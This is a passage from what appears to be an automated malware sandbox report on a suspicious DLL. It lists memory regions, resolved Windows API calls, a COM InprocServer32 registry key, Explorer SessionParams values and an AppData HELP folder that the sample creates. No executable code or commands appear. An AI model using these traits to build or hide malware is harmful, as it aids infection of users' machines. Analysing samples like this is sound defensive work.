| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (10)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Classes\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InprocServer32 | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Classes\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InprocServer32 | data = 0, size = 4, type = REG_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 3600, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, size = 2, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plgv, size = 88, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plpv, size = 92, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISFValue, size = 0, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISRValue, size = 0, type = REG_BINARY |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:25 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 94942 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 | |
| Get Info | type = Operating System |
|
1 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #18: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #18 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=AddAtomS /fn_args="1" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:32, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:57 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb28 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B2C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0011ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0022ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0037ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00447fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x00550fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000560000 | 0x00560000 | 0x0115ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x013cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x012cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000013c0000 | 0x013c0000 | 0x013cffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:25 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 95020 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #19: gorctexxzx.exe
150
0
| Information | Value |
|---|---|
| ID | #19 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=AddAtomT /fn_args="1" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:32, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:57 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb34 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B38
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
